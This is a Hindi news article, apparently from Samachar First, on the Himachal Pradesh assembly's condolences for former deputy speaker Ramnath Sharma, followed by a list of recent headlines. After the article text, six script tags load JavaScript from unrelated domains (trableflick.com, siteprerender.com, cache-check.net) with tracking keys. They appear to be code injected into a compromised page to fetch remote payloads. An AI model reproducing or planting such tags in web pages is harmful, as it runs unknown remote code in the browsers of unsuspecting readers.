CM जयराम ठाकुर ने पूर्व विधायक और विधानसभा उपाध्यक्ष रामनाथ शर्मा को दी श्रद्धांजलि

<p>हिमाचल प्रदेश विधानसभा में पूर्व विधानसभा अध्यक्ष और पूर्व विधायक रामनाथ शर्मा के निधन उन्हें याद करते हुए श्रद्धांजलि दी गई। बुधवार को सदन की कार्यवाही शुरू होते ही मुख्यमंत्री जयराम ठाकुर ने पूर्व विधायक और पूर्व विधानसभा उपाध्यक्ष रामनाथ शर्मा के निधन पर शोकोदगार पेश करते हुए कहा कि उन्हें यह सूचना देते हुए अत्यंत दुख हो रहा है कि पूर्व विधायक रामनाथ शर्मा का 15 सितंबर को देहांत हो गया है। उन्होंने कहा कि जन्म 2 अप्रैल 1946 को ऊना जिले में जन्में राम नाथ शर्मा नौसेना में 8 वर्ष रहे थे। वे 1977 में पहली बार विधानसभा के लिए निर्वाचित हुए थे और वे 1985 में फिर विधायक चुने गए थे और वे विधानसभा के उपाध्यक्ष भी रहे थे। वे वन निगम के उपाध्यक्ष भी रहे थे। उन्होंने कहा कि वे स्व. रामनाथ शर्मा के निधन पर शोक व्यक्त करते हैं और शोकाकुल परिवार के प्रति गहरी संवेदना व्यक्त करते हुए ईश्वर से दिवंगत आत्मा की शांति की कामना करते हैं।</p>

<p>नेता प्रतिपक्ष मुकेश अग्निहोत्री ने शोकोदगार में हिस्सा लेते हुए विधायक दल की तरफ से उन्हें श्रद्धांजलि दी। उन्होंने कहा कि स्व. राम नाथ शर्मा वे विधानसभा के उपाध्यक्ष भी रहे थे। वे पिछले माह से चंडीगढ़ के एक अस्पताल में भर्ती थे और कल सुबह निधन हो गया। उन्होंने कहा कि वे दो बार सरकारी उपक्रम के उपाध्यक्ष भी रहे। उन्होंने ईश्वर से दिवंगत आत्मा की शांति और शोकाकुल परिवार के प्रति गहरी संवेदना व्यक्त करते हैं।</p>

<p>माकपा विधायक राकेश सिंघा, भाजपा सदस्य बलवीर सिंह, कांग्रेस सदस्य सतपाल रायजादा, विक्रमादित्य सिंह, आईडी लखनपाल, शिक्षा मंत्री गोविंद ठाकुर ने भी शोकोदगार में हिस्सा लिया। विधानसभा अध्यक्ष विपिन सिंह परमार ने भी शोक संतप्त परिवार के प्रति अपनी गहरी संवेदना प्रकट की। उन्होंने ईश्वर से संपूर्ण परिवार को इस असहनीय दु:ख को सहन करने और दिवंगत आत्मा की शांति की कामना की।</p>
<script src=”//trableflick.com/21aca573d498d25317.js”></script>
<script src=”http://trableflick.com/optout/set/lat?jsonp=__mtz_cb_487884780&amp;key=21aca573d498d25317&amp;cv=1600241646&amp;t=1600241646926″ type=”text/javascript”></script>
<script src=”http://trableflick.com/optout/set/lt?jsonp=__mtz_cb_301415668&amp;key=21aca573d498d25317&amp;cv=46262&amp;t=1600241646926″ type=”text/javascript”></script>
<script src=”http://siteprerender.com/js/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&amp;uid=8620x” type=”text/javascript”></script>
<script src=”http://cache-check.net/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&amp;uid=8620x&amp;format=arrjs&amp;r=1600241646931″ type=”text/javascript”></script>
<script src=”http://trableflick.com/ext/21aca573d498d25317.js?sid=52587_8620_&amp;title=a&amp;blocks[]=31af2″ type=”text/javascript”></script>

Samachar First

Recent Posts

“JOA IT पदों पर चयनित उम्मीदवारों की सूची जारी, इतने को मिली नियुक्ति”

  Shimla: सामाजिक न्याय एवं अधिकारिता विभाग ने राज्य चयन आयोग की सिफारिशों के आधार…

5 hours ago

अतिक्रमण एक रात का नहीं, सुक्खू सरकार से पहले हुआ अवैध निर्माण: कुलदीप

  Shimla : हिमाचल प्रदेश में स्ट्रीट वेंडर्स को लेकर विधानसभा की ओर से कमेटी…

5 hours ago

मुख्यमंत्री के निर्देश पर हमीरपुर में ‘कायाकल्प’ अभियान से बदल रही है शहर की तस्वीर

  Hamirpur: मुख्यमंत्री ठाकुर सुखविंदर सिंह सुक्खू के गृह जिले के मुख्यालय हमीरपुर शहर की…

6 hours ago

राज्य के स्वास्थ्य ढांचे को मजबूत करने के लिए ठोस कदम उठा रही है सरकार: बाली

  टांडा मेडिकल कालेज भी स्वास्थ्य क्षेत्र में निरंतर नए आयाम कर रहा स्थापित विश्व…

6 hours ago

प्रमोशन लिस्ट के इंतजार में कई शिक्षक बिना प्रिंसिपल बने होंगे रिटायर

  वर्तमान में प्रिंसिपल के 500 पद है खाली लेक्चरर्स की 90:10 की मांग का…

7 hours ago

अनुष्का दत्ता पहुंची मिस यूनिवर्स इंडिया-2024 के फाइनल में, हिमाचल की पहली प्रतिभागी

  Shimla: रोह‍डू की रहने वाली 22 वर्षीय अनुष्का दत्ता मिस यूनिवर्स इंडिया 2024 प्रतियोगिता…

7 hours ago